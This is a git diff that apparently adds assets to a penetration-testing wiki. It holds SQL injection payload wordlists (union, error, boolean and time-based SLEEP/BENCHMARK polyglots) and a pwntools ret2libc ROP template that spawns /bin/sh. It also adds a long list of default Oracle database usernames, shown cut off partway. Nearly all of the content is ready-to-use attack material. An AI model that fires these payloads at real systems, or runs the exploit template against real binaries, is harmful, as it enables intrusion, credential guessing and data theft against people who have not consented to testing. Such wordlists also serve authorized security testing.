1,2,3,4,5-- 2 +") UniON SElecT 1,2# +") UniON SElecT 1,2,3# +") UniON SElecT 1,2,3,4# +") UniON SElecT 1,2,3,4,5# +")UniON(SElecT(1),2)-- 2 +")UniON(SElecT(1),2,3)-- 2 +")UniON(SElecT(1),2,3,4)-- 2 +")UniON(SElecT(1),2,3,4,5)-- 2 +")UniON(SElecT(1),2)# +")UniON(SElecT(1),2,3)# +")UniON(SElecT(1),2,3,4)# +")UniON(SElecT(1),2,3,4,5)# +')||('2 +')||2-- 2 +')||'2'||(' +')||2# +')||2/* +')||2||(' +")||("2 +")||2-- 2 +")||"2"||(" +")||2# +")||2/* +")||2||(" +')||'2'=('2 +')||'2'='2'||(' +')||2=2-- 2 +')||2=2# +')||2=2/* +')||2=2||(' +")||"2"=("2 +")||"2"="2"||(" +")||2=2-- 2 +")||2=2# +")||2=2/* +")||2=2||(" +')||2=(2)LimIT(1)-- 2 +')||2=(2)LimIT(1)# +')||2=(2)LimIT(1)/* +")||2=(2)LimIT(1)-- 2 +")||2=(2)LimIT(1)# +")||2=(2)LimIT(1)/* +')||true-- 2 +')||true# +')||true/* +')||true||(' +")||true-- 2 +")||true# +")||true/* +")||true||(" +')||'2'LiKE('2 +')||'2'LiKE'2'-- 2 +')||'2'LiKE'2'# +')||'2'LiKE'2'/* +')||'2'LiKE'2'||(' +')||(2)LiKE(2)-- 2 +')||(2)LiKE(2)# +')||(2)LiKE(2)/* +')||(2)LiKE(2)||(' +")||"2"LiKE("2 +")||"2"LiKE"2"-- 2 +")||"2"LiKE"2"# +")||"2"LiKE"2"/* +")||"2"LiKE"2"||(" +")||(2)LiKE(2)-- 2 +")||(2)LiKE(2)# +")||(2)LiKE(2)/* +")||(2)LiKE(2)||(" +' UnION SELeCT 1,2` +' UnION SELeCT 1,2,3` +' UnION SELeCT 1,2,3,4` +' UnION SELeCT 1,2,3,4,5` +" UnION SELeCT 1,2` +" UnION SELeCT 1,2,3` +" UnION SELeCT 1,2,3,4` +" UnION SELeCT 1,2,3,4,5` \ No newline at end of file diff --git a/.gitbook/assets/sqli-error.txt b/.gitbook/assets/sqli-error.txt new file mode 100644 index 00000000000..693ccdd13c8 --- /dev/null +++ b/.gitbook/assets/sqli-error.txt @@ -0,0 +1,40 @@ +'asd +')asd +''asd +'))asd +`ads +`)asd +``asd +`))asd +, +"asd +")asd +""asd +"))asd +/ +// +\ +\\ +;ad +%2527asd +%2522asd +-- - +# +/* +1 +-1 +999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 +-999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 +asd +| +& +|| +&& +@ +% +; +> +!"·$%&(=?¿'¡`<>);:_#-@ +SLEEP(5) +SLEEP(5) /*' or SLEEP(5) or '" or SLEEP(5) or "*/ +SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(5))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(5)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(5)))OR"*/ FROM some_table WHERE ex = ample \ No newline at end of file diff --git a/src/files/sqli-hashbypass.txt b/.gitbook/assets/sqli-hashbypass.txt similarity index 100% rename from src/files/sqli-hashbypass.txt rename to .gitbook/assets/sqli-hashbypass.txt diff --git a/.gitbook/assets/sqli-logic.txt b/.gitbook/assets/sqli-logic.txt new file mode 100644 index 00000000000..6efb4fbff58 --- /dev/null +++ b/.gitbook/assets/sqli-logic.txt @@ -0,0 +1,82 @@ +true +1 +1>0 +2-1 +0+1 +1*1 +1%2 +1 & 1 +1&1 +1 && 2 +1&&2 +-1 || 1 +-1||1 +-1 oR 1=1 +1 aND 1=1 +(1)oR(1=1) +(1)aND(1=1) +-1/**/oR/**/1=1 +1/**/aND/**/1=1 +1' +1'>'0 +2'-'1 +0'+'1 +1'*'1 +1'%'2 +1'&'1'='1 +1'&&'2'='1 +-1'||'1'='1 +-1'oR'1'='1 +1'aND'1'='1 +1" +1">"0 +2"-"1 +0"+"1 +1"*"1 +1"%"2 +1"&"1"="1 +1"&&"2"="1 +-1"||"1"="1 +-1"oR"1"="1 +1"aND"1"="1 +1` +1`>`0 +2`-`1 +0`+`1 +1`*`1 +1`%`2 +1`&`1`=`1 +1`&&`2`=`1 +-1`||`1`=`1 +-1`oR`1`=`1 +1`aND`1`=`1 +1')>('0 +2')-('1 +0')+('1 +1')*('1 +1')%('2 +1')&'1'=('1 +1')&&'1'=('1 +-1')||'1'=('1 +-1')oR'1'=('1 +1')aND'1'=('1 +1")>("0 +2")-("1 +0")+("1 +1")*("1 +1")%("2 +1")&"1"=("1 +1")&&"1"=("1 +-1")||"1"=("1 +-1")oR"1"=("1 +1")aND"1"=("1 +1`)>(`0 +2`)-(`1 +0`)+(`1 +1`)*(`1 +1`)%(`2 +1`)&`1`=(`1 +1`)&&`1`=(`1 +-1`)||`1`=(`1 +-1`)oR`1`=(`1 +1`)aND`1`=(`1 diff --git a/.gitbook/assets/sqli-true.txt b/.gitbook/assets/sqli-true.txt new file mode 100644 index 00000000000..d28f1dfac22 --- /dev/null +++ b/.gitbook/assets/sqli-true.txt @@ -0,0 +1,421 @@ +true +'&' +"&" +'^' +"^" +'*' +"*" +0=0 +'=' +"=" +')&(' +")&(" +')^(' +")^(" +')*(' +")*(" +0)=(0 +')=(' +")=(" +'))&((' +"))&((" +'))^((' +"))^((" +'))*((' +"))*((" +0))=((0 +'))=((' +"))=((" +2'LIkE'3 +2"LIkE"3 +-3')LIkE('3 +-3")LIkE("3 +-3'))LIkE(('3 +-3"))LIkE(("3 +-3 oR 2=2 +-3' oR 2=2-- 2 +-3' oR 2=2# +-3' oR 2=2/* +-3" oR 2=2-- 2 +-3" oR 2=2# +-3" oR 2=2/* +-3 oR 2 +-3' oR 2-- 2 +-3' oR 2# +-3' oR 2/* +-3" oR 2-- 2 +-3" oR 2# +-3" oR 2/* +-3 oR 2>0 +-3' oR 2>0-- 2 +-3' oR 2>0# +-3' oR 2>0/* +-3" oR 2>0-- 2 +-3" oR 2>0# +-3" oR 2>0/* +-3 oR 0<2 +-3' oR 0<2-- 2 +-3' oR 0<2# +-3' oR 0<2/* +-3" oR 0<2-- 2 +-3" oR 0<2# +-3" oR 0<2/* +-3 oR 2 LIkE 2 +-3' oR 2 LIkE 2-- 2 +-3' oR 2 LIkE 2# +-3' oR 2 LIkE 2/* +-3" oR 2 LIkE 2-- 2 +-3" oR 2 LIkE 2# +-3" oR 2 LIkE 2/* +-3 oR '2'='2' +-3' oR 2 oR ' +-3'oR'2'oR' +-3" oR 2 oR " +-3"oR"2"oR" +-3 oR true +-3' oR true-- 2 +-3' oR true# +-3' oR true/* +-3" oR true-- 2 +-3" oR true# +-3" oR true/* +-3'oR''+'2 +-3"oR""+"2 +-3'oR''-'-2 +-3"oR""-"-2 +-3'oR'2'&'2 +-3"oR"2"&"2 +-3'oR''^'2 +-3"oR""^"2 +-3'oR'2'*'2 +-3"oR"2"*"2 +-3'oR'2'>'0 +-3"oR"0"<"2 +-3'oR'2'='2 +-3"oR"2"="2 +-3/**/oR/**/2=2 +-3'/**/oR/**/2=2# +-3'/**/oR/**/2=2/* +-3"/**/oR/**/2=2# +-3"/**/oR/**/2=2/* +-3/**/oR/**/2 +-3'/**/oR/**/2# +-3'/**/oR/**/2/* +-3"/**/oR/**/2# +-3"/**/oR/**/2/* +-3/**/oR/**/2>0 +-3'/**/oR/**/2>0# +-3'/**/oR/**/2>0/* +-3"/**/oR/**/2>0# +-3"/**/oR/**/2>0/* +-3/**/oR/**/0<2 +-3'/**/oR/**/0<2# +-3'/**/oR/**/0<2/* +-3"/**/oR/**/0<2# +-3"/**/oR/**/0<2/* +-3/**/oR/**/2/**/LIkE/**/2 +-3'/**/oR/**/2/**/LIkE/**/2# +-3'/**/oR/**/2/**/LIkE/**/2/* +-3"/**/oR/**/2/**/LIkE/**/2# +-3"/**/oR/**/2/**/LIkE/**/2/* +-3/**/oR/**/'2'='2' +-3'/**/oR/**/2/**/oR/**/' +-3"/**/oR/**/2/**/oR/**/" +-3/**/oR/**/true +-3'/**/oR/**/true# +-3'/**/oR/**/true/* +-3"/**/oR/**/true# +-3"/**/oR/**/true/* +-3||2=2 +-3'||2=2-- 2 +-3'||2=2# +-3'||2=2/* +-3"||2=2-- 2 +-3"||2=2# +-3"||2=2/* +-3||2 +-3'||2-- 2 +-3'||2# +-3'||2/* +-3"||2-- 2 +-3"||2# +-3"||2/* +-3||2>0 +-3'||2>0-- 2 +-3'||2>0# +-3'||2>0/* +-3"||2>0-- 2 +-3"||2>0# +-3"||2>0/* +-3||0<2 +-3'||0<2-- 2 +-3'||0<2# +-3'||0<2/* +-3"||0<2-- 2 +-3"||0<2# +-3"||0<2/* +-3||(2)LIkE(2) +-3'||(2)LIkE(2)-- 2 +-3'||(2)LIkE(2)# +-3'||(2)LIkE(2)/* +-3"||(2)LIkE(2)-- 2 +-3"||(2)LIkE(2)# +-3"||(2)LIkE(2)/* +-3||'2'='2' +-3'||'2'='2 +-3"||"2"="2 +-3'||2||' +-3'||'2'||' +-3"||2||" +-3"||"2"||" +-3||true +-3'||true-- 2 +-3'||true# +-3'||true/* +-3"||true-- 2 +-3"||true# +-3"||true/* +-3'||''+'2 +-3"||""+"2 +-3'||''-'-2 +-3"||""-"-2 +-3'||'2'&'2 +-3"||"2"&"2 +-3'||''^'2 +-3"||""^"2 +-3'||'2'*'2 +-3"||"2"*"2 +(-3)oR(2)=(2) +-3'oR(2)=(2)# +-3'oR(2)=(2)/* +-3"oR(2)=(2)# +-3"oR(2)=(2)/* +(-3)oR(2) +-3'oR(2)# +-3'oR(2)/* +-3"oR(2)# +-3"oR(2)/* +(-3)oR(2)LIkE(2) +-3'oR(2)LIkE(2)# +-3'oR(2)LIkE(2)/* +-3"oR(2)LIkE(2)# +-3"oR(2)LIkE(2)/* +(-3)oR'2'='2' +-3"oR"(2)"="(2) +-3'oR(2)oR' +-3"oR(2)oR" +(-3)oR(true) +-3'oR(true)# +-3'oR(true)/* +-3"oR(true)# +-3"oR(true)/* +-3)oR(2)=(2 +-3')oR(2)=2-- 2 +-3')oR(2)=2# +-3')oR(2)=2/* +-3")oR(2)=2-- 2 +-3")oR(2)=2# +-3")oR(2)=2/* +-3)oR(2 +-3')oR(2)-- 2 +-3')oR(2)# +-3')oR(2)/* +-3")oR(2)-- 2 +-3")oR(2)# +-3")oR(2)/* +-3)oR(2)>(0 +-3')oR(2)>0-- 2 +-3')oR(2)>0# +-3')oR(2)>0/* +-3")oR(2)>0-- 2 +-3")oR(2)>0# +-3")oR(2)>0/* +-3)oR(0)<(2 +-3')oR(0)<2-- 2 +-3')oR(0)<2# +-3')oR(0)<2/* +-3")oR(0)<2-- 2 +-3")oR(0)<2# +-3")oR(0)<2/* +-3)oR(2)LIkE(2 +-3')oR(2)LIkE(2)-- 2 +-3')oR(2)LIkE(2)# +-3')oR(2)LIkE(2)/* +-3")oR(2)LIkE(2)-- 2 +-3")oR(2)LIkE(2)# +-3")oR(2)LIkE(2)/* +-3)oR'2'=('2' +-3')oR'2'=('2 +-3")oR"2"=("2 +-3')oR(2)oR(' +-3')oR'2'oR(' +-3")oR(2)oR(" +-3")oR"2"oR(" +-3)oR(true +-3')oR(true)-- 2 +-3')oR(true)# +-3')oR(true)/* +-3")oR(true)-- 2 +-3")oR(true)# +-3")oR(true)/* +-3')oR''+('2 +-3")oR""+("2 +-3')oR''-('-2 +-3")oR""-("-2 +-3')oR'2'&('2 +-3")oR"2"&("2 +-3')oR''^('2 +-3")oR""^("2 +-3')oR'2'*('2 +-3")oR"2"*("2 +-3')/**/oR/**/2/**/oR/**/(' +-3")/**/oR/**/2/**/oR/**/(" +-3)||2=(2 +-3')||2=2-- 2 +-3')||2=2# +-3')||2=2/* +-3")||2=2-- 2 +-3")||2=2# +-3")||2=2/* +-3)||(2 +-3')||2-- 2 +-3')||2# +-3')||2/* +-3")||2-- 2 +-3")||2# +-3")||2/* +-3||(2)LIkE(2 +-3')||(2)LIkE2-- 2 +-3')||(2)LIkE2# +-3')||(2)LIkE2/* +-3")||(2)LIkE2-- 2 +-3")||(2)LIkE2# +-3")||(2)LIkE2/* +-3)||'2'=('2' +-3')||'2'=('2 +-3")||"2"=("2 +-3')||2||(' +-3')||'2'||(' +-3")||2||(" +-3")||"2"||(" +-3)||(true +-3')||(true)-- 2 +-3')||(true)# +-3')||(true)/* +-3")||(true)-- 2 +-3")||(true)# +-3")||(true)/* +-3')||''+('2 +-3")||""+("2 +-3')||''-('-2 +-3")||""-("-2 +-3')||'2'&('2 +-3")||"2"&("2 +-3')||''^('2 +-3")||""^("2 +-3')||'2'*('2 +-3")||"2"*("2 +-3))oR(2)=((2 +-3'))oR(2)=2-- 2 +-3'))oR(2)=2# +-3'))oR(2)=2/* +-3"))oR(2)=2-- 2 +-3"))oR(2)=2# +-3"))oR(2)=2/* +-3))oR((2 +-3'))oR(2)-- 2 +-3'))oR(2)# +-3'))oR(2)/* +-3"))oR(2)-- 2 +-3"))oR(2)# +-3"))oR(2)/* +-3))oR(2)>((0 +-3'))oR(2)>0-- 2 +-3'))oR(2)>0# +-3'))oR(2)>0/* +-3"))oR(2)>0-- 2 +-3"))oR(2)>0# +-3"))oR(2)>0/* +-3))oR(0)<((2 +-3'))oR(0)<2-- 2 +-3'))oR(0)<2# +-3'))oR(0)<2/* +-3"))oR(0)<2-- 2 +-3"))oR(0)<2# +-3"))oR(0)<2/* +-3))oR(2)LIkE((2 +-3'))oR(2)LIkE(2)-- 2 +-3'))oR(2)LIkE(2)# +-3'))oR(2)LIkE(2)/* +-3"))oR(2)LIkE(2)-- 2 +-3"))oR(2)LIkE(2)# +-3"))oR(2)LIkE(2)/* +-3))oR'2'=(('2' +-3'))oR'2'=(('2 +-3"))oR"2"=(("2 +-3'))oR(2)oR((' +-3'))oR'2'oR((' +-3"))oR(2)oR((" +-3"))oR"2"oR((" +-3))oR((true +-3'))oR(true)-- 2 +-3'))oR(true)# +-3'))oR(true)/* +-3"))oR(true)-- 2 +-3"))oR(true)# +-3"))oR(true)/* +-3'))oR''+(('2 +-3"))oR""+(("2 +-3'))oR''-(('-2 +-3"))oR""-(("-2 +-3'))oR'2'&(('2 +-3"))oR"2"&(("2 +-3'))oR''^(('2 +-3"))oR""^(("2 +-3'))oR'2'*(('2 +-3"))oR"2"*(("2 +-3))||2=((2 +-3'))||2=2-- 2 +-3'))||2=2# +-3'))||2=2/* +-3"))||2=2-- 2 +-3"))||2=2# +-3"))||2=2/* +-3))||((2 +-3'))||2-- 2 +-3'))||2# +-3'))||2/* +-3"))||2-- 2 +-3"))||2# +-3"))||2/* +-3||(2)LIkE((2 +-3'))||(2)LIkE2-- 2 +-3'))||(2)LIkE2# +-3'))||(2)LIkE2/* +-3"))||(2)LIkE2-- 2 +-3"))||(2)LIkE2# +-3"))||(2)LIkE2/* +-3))||'2'=(('2' +-3'))||'2'=(('2 +-3"))||"2"=(("2 +-3'))||2||((' +-3'))||'2'||((' +-3"))||2||((" +-3"))||"2"||((" +-3))||((true +-3'))||(true)-- 2 +-3'))||(true)# +-3'))||(true)/* +-3"))||(true)-- 2 +-3"))||(true)# +-3"))||(true)/* +-3'))||''+(('2 +-3"))||""+(("2 +-3'))||''-(('-2 +-3"))||""-(("-2 +-3'))||'2'&(('2 +-3"))||"2"&(("2 +-3'))||''^(('2 +-3"))||""^(("2 +-3'))||'2'*(('2 +-3"))||"2"*(("2 \ No newline at end of file diff --git a/.gitbook/assets/ssti-methodology-diagram.png b/.gitbook/assets/ssti-methodology-diagram.png new file mode 100644 index 00000000000..90b57b2d9e8 Binary files /dev/null and b/.gitbook/assets/ssti-methodology-diagram.png differ diff --git a/src/images/template.py b/.gitbook/assets/template.py similarity index 91% rename from src/images/template.py rename to .gitbook/assets/template.py index f26b4a8522b..8f889b5e158 100644 --- a/src/images/template.py +++ b/.gitbook/assets/template.py @@ -1,9 +1,9 @@ from pwn import * # Import pwntools -################### -### CONNECTION #### -################### +#################### +#### CONNECTION #### +#################### LOCAL = True REMOTETTCP = False REMOTESSH = False @@ -36,9 +36,9 @@ gdb.attach(p.pid, "continue") -################### -### Find offset ### -################### +#################### +#### Find offset ### +#################### OFFSET = "A"*40 if OFFSET == "": gdb.attach(p.pid, "c") #Attach and continue @@ -51,9 +51,9 @@ exit() -#################### -### Find Gadgets ### -#################### +##################### +#### Find Gadgets ### +##################### PUTS_PLT = elf.plt['puts'] #PUTS_PLT = elf.symbols["puts"] # This is also valid to call puts MAIN_PLT = elf.symbols['main'] POP_RDI = (rop.find_gadget(['pop rdi', 'ret']))[0] #Same as ROPgadget --binary vuln | grep "pop rdi" @@ -93,9 +93,9 @@ def get_addr(func_name): # this implies that in the future if you search for functions in libc, the resulting address # will be the real one, you can use it directly (NOT NEED TO ADD AGAINF THE LIBC BASE ADDRESS) -################################ -## GET SHELL with known LIBC ### -################################ +################################# +### GET SHELL with known LIBC ### +################################# BINSH = next(libc.search("/bin/sh")) #Verify with find /bin/sh SYSTEM = libc.sym["system"] EXIT = libc.sym["exit"] @@ -108,5 +108,5 @@ def get_addr(func_name): p.clean() p.sendline(rop2) -#### Interact with the shell ##### +##### Interact with the shell ##### p.interactive() #Interact with the conenction \ No newline at end of file diff --git a/.gitbook/assets/users-oracle.txt b/.gitbook/assets/users-oracle.txt new file mode 100644 index 00000000000..f95874bec93 --- /dev/null +++ b/.gitbook/assets/users-oracle.txt @@ -0,0 +1,1369 @@ +AASH +ABA1 +abm +ABM +adams +ADAMS +adldemo +ADLDEMO +admin +ADMIN +administrator +ADMINISTRATOR +AD_MONITOR +ADS +ADSEUL_US +ahl +AHL +ahm +AHM +ak +AK +AL +ALA1 +alhro +ALHRO +alhrw +ALHRW +ALLUSERS +alr +ALR +AMA1 +AMA2 +AMA3 +AMA4 +AMF +ams +AMS +AMS1 +AMS2 +AMS3 +AMS4 +AMSYS +amv +AMV +AMW +andy +ANDY +ANNE +anonymous +ANONYMOUS +AOLDEMO +ap +AP +APA1 +APA2 +APA3 +APA4 +APPLEAD +applmgr +APPLMGR +applsys +APPLSYS +applsyspub +APPLSYSPUB +applysyspub +APPLYSYSPUB +apps +APPS +apps_mrc +APPS_MRC +appuser +APPUSER +APS1 +APS2 +APS3 +APS4 +aq +AQ +aqdemo +AQDEMO +aqjava +AQJAVA +aquser +AQUSER +ar +AR +ARA1 +ARA2 +ARA3 +ARA4 +ARS1 +ARS2 +ARS3 +ARS4 +ART +asf +ASF +asg +ASG +asl +ASL +ASN +aso +ASO +asp +ASP +ast +AST +atm +ATM +AUC_GUEST +audiouser +AUDIOUSER +aurora$jis$utility$ +AURORA$JIS$UTILITY$ +aurora$orb$unauthenticated +AURORA$ORB$UNAUTHENTICATED +AUTHORIA +ax +AX +az +AZ +B2B +BAM +bc4j +BC4J +BCA1 +BCA2 +ben +BEN +bic +BIC +bil +BIL +bim +BIM +bis +BIS +biv +BIV +bix +BIX +blake +BLAKE +blewis +BLEWIS +BMEADOWS +BNE +bom +BOM +BP01 +BP02 +BP03 +BP04 +BP05 +BP06 +brio_admin +BRIO_ADMIN +brugernavn +BRUGERNAVN +brukernavn +BRUKERNAVN +bsc +BSC +bug_reports +BUG_REPORTS +BUYACCT +BUYAPPR1 +BUYAPPR2 +BUYAPPR3 +BUYER +BUYMTCH +calvin +CALVIN +CAMRON +CANDICE +CARL +CARLY +CARMEN +CARRIECONYERS +CATADMIN +catalog +CATALOG +cct +CCT +cdemo82 +CDEMO82 +cdemocor +CDEMOCOR +cdemorid +CDEMORID +cdemoucb +CDEMOUCB +cdouglas +CDOUGLAS +ce +CE +CEASAR +centra +CENTRA +central +CENTRAL +CFD +CHANDRA +CHARLEY +CHRISBAKER +CHRISTIE +cids +CIDS +CINDY +cis +CIS +cisinfo +CISINFO +clark +CLARK +CLAUDE +CLINT +CLN +cn +CN +CNCADMIN +company +COMPANY +compiere +COMPIERE +CONNIE +CONNOR +CORY +cqschemauser +CQSCHEMAUSER +cquserdbuser +CQUSERDBUSER +CRM1 +CRM2 +crp +CRP +CRPB733 +CRPCTL +CRPDTA +cs +CS +CSADMIN +CSAPPR1 +csc +CSC +csd +CSD +CSDUMMY +cse +CSE +csf +CSF +csi +CSI +csl +CSL +CSM +csmig +CSMIG +csp +CSP +csr +CSR +css +CSS +ctxdemo +CTXDEMO +ctxsys +CTXSYS +CTXTEST +cua +CUA +cue +CUE +cuf +CUF +cug +CUG +cui +CUI +cun +CUN +cup +CUP +cus +CUS +cz +CZ +data_schema +DATA_SCHEMA +DAVIDMORGAN +dbi +DBI +dbsnmp +DBSNMP +dbvision +DBVISION +DCM +DD7333 +DD7334 +DD810 +DD811 +DD812 +DD9 +DDB733 +DDD +ddic +DDIC +demo +DEMO +demo8 +DEMO8 +demo9 +DEMO9 +des +DES +des2k +DES2K +dev2000_demos +DEV2000_DEMOS +DEVB733 +DEVUSER +DGRAY +diane +DIANE +dip +DIP +DISCOVERER5 +discoverer_admin +DISCOVERER_ADMIN +DKING +DLD +DMADMIN +DMATS +DMS +dmsys +DMSYS +DOM +dpf +DPF +DPOND +dsgateway +DSGATEWAY +dssys +DSSYS +dtsp +DTSP +DV7333 +DV7334 +DV810 +DV811 +DV812 +DV9 +DVP1 +eaa +EAA +eam +EAM +earlywatch +EARLYWATCH +east +EAST +ec +EC +ecx +ECX +EDR +EDWEUL_US +EDWREP +EGC1 +EGD1 +EGM1 +EGO +EGR1 +ejb +EJB +ejsadmin +EJSADMIN +emp +EMP +END1 +eng +ENG +eni +ENI +ENM1 +ENS1 +ENTMGR_CUST +ENTMGR_PRO +ENTMGR_TRAIN +EOPP_PORTALADM +EOPP_PORTALMGR +EOPP_USER +estoreuser +ESTOREUSER +EUL_US +event +EVENT +evm +EVM +EXA1 +EXA2 +EXA3 +EXA4 +example +EXAMPLE +exfsys +EXFSYS +EXS1 +EXS2 +EXS3 +EXS4 +extdemo +EXTDEMO +extdemo2 +EXTDEMO2 +fa +FA +fem +FEM +FIA1 +fii +FII +finance +FINANCE +finprod +FINPROD +flm +FLM +fnd +FND +FNI1 +FNI2 +foo +FOO +FPA +fpt +FPT +frm +FRM +frosty +FROSTY +FTA1 +fte +FTE +FUN +fv +FV +FVP1 +GALLEN +GCA1 +GCA2 +GCA3 +GCA9 +GCMGR1 +GCMGR2 +GCMGR3 +GCS +GCS1 +GCS2 +GCS3 +GEORGIAWINE +gl +GL +GLA1 +GLA2 +GLA3 +GLA4 +GLS1 +GLS2 +GLS3 +GLS4 +gma +GMA +GM_AWDA +GM_COPI +gmd +GMD +GM_DPHD +gme +GME +gmf +GMF +gmi +GMI +gml +GML +GM_MLCT +gmp +GMP +GM_PLADMA +GM_PLADMH +GM_PLCCA +GM_PLCCH +GM_PLCOMA +GM_PLCOMH +GM_PLCONA +GM_PLCONH +GM_PLNSCA +GM_PLNSCH +GM_PLSCTA +GM_PLSCTH +GM_PLVET +gms +GMS +GM_SPO +GM_STKH +gpfd +GPFD +gpld +GPLD +gr +GR +GUEST +hades +HADES +HCC +hcpark +HCPARK +HHCFO +hlw +HLW +hr +HR +hri +HRI +hvst +HVST +hxc +HXC +hxt +HXT +IA +iba +IBA +IBC +ibe +IBE +ibp +IBP +ibu +IBU +iby +IBY +icdbown +ICDBOWN +icx +ICX +idemo_user +IDEMO_USER +ieb +IEB +iec +IEC +iem +IEM +ieo +IEO +ies +IES +ieu +IEU +iex +IEX +ifssys +IFSSYS +igc +IGC +igf +IGF +igi +IGI +igs +IGS +igw +IGW +imageuser +IMAGEUSER +imc +IMC +imedia +IMEDIA +imt +IMT +INS1 +INS2 +#internal +internal +#INTERNAL +INTERNAL +inv +INV +IP +ipa +IPA +ipd +IPD +iplanet +IPLANET +isc +ISC +ISTEWARD +itg +ITG +ja +JA +jake +JAKE +JD7333 +JD7334 +JD9 +JDE +JDEDBA +je +JE +jg +JG +jill +JILL +jl +JL +JL +jmuser +JMUSER +john +JOHN +JOHNINARI +jones +JONES +jtf +JTF +JTI +jtm +JTM +JTR +jts +JTS +JUNK_PS +JUSTOSHUM +jward +JWARD +KELLYJONES +KEVINDONS +KPN +kwalker +KWALKER +l2ldemo +L2LDEMO +LADAMS +LBA +lbacsys +LBACSYS +LDQUAL +LHILL +librarian +LIBRARIAN +LNS +LQUINCY +LSA +manprod +MANPROD +mark +MARK +mascarm +MASCARM +master +MASTER +mddata +MDDATA +mddemo +MDDEMO +mddemo_clerk +MDDEMO_CLERK +mddemo_mgr +MDDEMO_MGR +mdsys +MDSYS +me +ME +mfg +MFG +mgr +MGR +MGR1 +MGR2 +MGR3 +MGR4 +mgwuser +MGWUSER +migrate +MIGRATE +MIKEIKEGAMI +miller +MILLER +MJONES +MLAKE +MM1 +MM2 +MM3 +MM4 +MM5 +MMARTIN +mmo2 +MMO2 +MOBILEADMIN +modtest +MODTEST +moreau +MOREAU +mrp +MRP +msc +MSC +msd +MSD +mso +MSO +msr +MSR +MST +mtssys +MTSSYS +mts_user +MTS_USER +mwa +MWA +mxagent +MXAGENT +names +NAMES +NEILKATSU +neotix_sys +NEOTIX_SYS +nneul +NNEUL +nomeutente +NOMEUTENTE +nome_utilizador +NOME_UTILIZADOR +nom_utilisateur +NOM_UTILISATEUR +nume_utilizator +NUME_UTILIZATOR +oas_public +OAS_PUBLIC +OBJ7333 +OBJ7334 +OBJB733 +OCA +ocitest +OCITEST +ocm_db_admin +OCM_DB_ADMIN +odm +ODM +odm_mtr +ODM_MTR +ods +ODS +odscommon +ODSCOMMON +ods_server +ODS_SERVER +oe +OE +oemadm +OEMADM +oemrep +OEMREP +okb +OKB +okc +OKC +oke +OKE +oki +OKI +OKL +oko +OKO +okr +OKR +oks +OKS +okx +OKX +OL810 +OL811 +OL812 +OL9 +olapdba +OLAPDBA +olapsvr +OLAPSVR +olapsys +OLAPSYS +omwb_emulation +OMWB_EMULATION +ont +ONT +oo +OO +openspirit +OPENSPIRIT +opi +OPI +ORABAM +ORABAMSAMPLES +ORABPEL +oracache +ORACACHE +oracle +ORACLE +oradba +ORADBA +ORAESB +ORAOCA_PUBLIC +oraprobe +ORAPROBE +oraregsys +ORAREGSYS +ORASAGENT +orasso +ORASSO +orasso_ds +ORASSO_DS +orasso_pa +ORASSO_PA +orasso_ps +ORASSO_PS +orasso_public +ORASSO_PUBLIC +orastat +ORASTAT +orcladmin +ORCLADMIN +ordcommon +ORDCOMMON +ordplugins +ORDPLUGINS +ordsys +ORDSYS +ose$http$admin +OSE$HTTP$ADMIN +osm +OSM +osp22 +OSP22 +ota +OTA +outln +OUTLN +owa +OWA +OWAPUB +owa_public +OWA_PUBLIC +owf_mgr +OWF_MGR +owner +OWNER +ozf +OZF +ozp +OZP +ozs +OZS +pa +PA +PABLO +PAIGE +PAM +panama +PANAMA +PARRISH +PARSON +PAT +PATORILY +PATRICKSANCHEZ +patrol +PATROL +PATSY +paul +PAUL +PAULA +PAXTON +PCA1 +PCA2 +PCA3 +PCA4 +PCS1 +PCS2 +PCS3 +PCS4 +PD7333 +PD7334 +PD810 +PD811 +PD812 +PD9 +PDA1 +PEARL +PEG +PENNY +PEOPLE +PERCY +perfstat +PERFSTAT +PERRY +perstat +PERSTAT +PETE +PEYTON +PHIL +PJI +pjm +PJM +planning +PLANNING +plex +PLEX +plsql +PLSQL +pm +PM +pmi +PMI +pn +PN +po +PO +po7 +PO7 +po8 +PO8 +poa +POA +POLLY +pom +POM +PON +PORTAL +portal30 +PORTAL30 +portal30_admin +PORTAL30_ADMIN +portal30_demo +PORTAL30_DEMO +portal30_ps +PORTAL30_PS +portal30_public +PORTAL30_PUBLIC +portal30_sso +PORTAL30_SSO +portal30_sso_admin +PORTAL30_SSO_ADMIN +portal30_sso_ps +PORTAL30_SSO_PS +portal30_sso_public +PORTAL30_SSO_PUBLIC +PORTAL_APP +portal_demo +PORTAL_DEMO +PORTAL_PUBLIC +portal_sso_ps +PORTAL_SSO_PS +pos +POS +powercartuser +POWERCARTUSER +PPM1 +PPM2 +PPM3 +PPM4 +PPM5 +primary +PRIMARY +PRISTB733 +PRISTCTL +PRISTDTA +PRODB733 +PRODCTL +PRODDTA +PRODUSER +PROJMFG +PRP +PS +PS810 +PS810CTL +PS810DTA +PS811 +PS811CTL +PS811DTA +PS812 +PS812CTL +PS812DTA +psa +PSA +psb +PSB +PSBASS +PSEM +PSFT +PSFTDBA +psp +PSP +PTADMIN +PTCNE +PTDMO +PTE +PTESP +PTFRA +PTG +PTGER +PTJPN +PTUKE +PTUPG +PTWEB +PTWEBSERVER +pubsub +PUBSUB +pubsub1 +PUBSUB1 +pv +PV +PY7333 +PY7334 +PY810 +PY811 +PY812 +PY9 +qa +QA +qdba +QDBA +QOT +qp +QP +QRM +qs +QS +qs_adm +QS_ADM +qs_cb +QS_CB +qs_cbadm +QS_CBADM +qs_cs +QS_CS +qs_es +QS_ES +qs_os +QS_OS +qs_ws +QS_WS +re +RE +RENE +repadmin +REPADMIN +rep_manager +REP_MANAGER +reports +REPORTS +reports_user +REPORTS_USER +rep_owner +REP_OWNER +rep_user +REP_USER +RESTRICTED_US +rg +RG +rhx +RHX +rla +RLA +rlm +RLM +RM1 +RM2 +RM3 +RM4 +RM5 +rmail +RMAIL +rman +RMAN +ROB +RPARKER +rrs +RRS +RWA1 +SALLYH +SAM +sample +SAMPLE +sap +SAP +sapr3 +SAPR3 